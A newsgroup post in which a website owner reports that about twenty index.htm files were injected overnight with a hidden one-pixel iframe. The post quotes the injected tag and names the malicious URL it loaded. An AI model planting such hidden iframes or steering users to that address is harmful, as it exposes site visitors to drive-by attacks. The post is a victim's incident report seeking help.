Hi newsgroup,
it appears someone has broken into my site. This morning I found about 20
files (each called index.htm) suddenly featured this line:
<IFRAME SRC="url-of-bad-site" WIDTH=1 HEIGHT=1></IFRAME>
and their last modified date was set to today between midnight and 1 GMT. In
some files, this line was placed directly after the body opening tag, in
others it was just before </body>. In one file where the whole document is
written in javascript, they had even escaped their quotes!
The malicious url is www.b00gle.com/fa/?d=get
I have no access to the raw server logs and my own log script shows no
strange hits around that time.
How have they done this? And what can I do about it? I ask here because the
site uses PHP a lot but I guess there are more appropriate places to ask.
Thanks
Ivo